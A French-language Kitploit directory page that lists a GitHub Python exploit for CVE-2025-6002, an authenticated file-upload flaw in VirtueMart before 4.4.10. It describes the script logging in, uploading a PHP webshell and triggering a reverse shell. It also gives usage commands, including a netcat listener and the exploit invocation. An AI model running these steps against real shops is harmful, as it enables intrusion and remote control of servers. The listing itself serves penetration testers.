Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6002 — Exploit Python pour CVE-2025-6002 ciblant le téléversement arbitraire de fichiers authentifié dans VirtueMart < 4.4.10. Se connecte, téléverse un webshell PHP et déclenche un reverse shell pour les tests de pénétration. | Kitploit
Outils/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'Intrusion
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Exploit Python pour CVE-2025-6002 ciblant le téléversement arbitraire de fichiers authentifié dans VirtueMart < 4.4.10. Se connecte, téléverse un webshell PHP et déclenche un reverse shell pour les tests de pénétration.

Voir le dépôt
9il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2025-6002

Ce script exploite la vulnérabilité de téléversement arbitraire de fichiers authentifié dans VirtueMart < 4.4.10 (CVE-2025-6002), décrite dans cet article de blog : https://blog.blacklanternsecurity.com/p/doomla-zero-days

Ce script se connecte à VirtueMart avec les identifiants fournis, crée un nouveau produit et téléverse un webshell PHP en tant que fichier média. Il invoque ensuite un reverse shell vers l'IP/le port fournis.

Paramètres :

  • --url: l'URL de VirtueMart
  • --username: nom d'utilisateur admin
  • --password: mot de passe admin
  • --remote-ip: adresse IP de l'attaquanthttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: port de l'attaquant

Utilisation :

  1. Exécutez Netcat sur la machine de l'attaquant :
nc -nlvp 1337
  1. Exécutez l'exploit
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Télécharger l’outil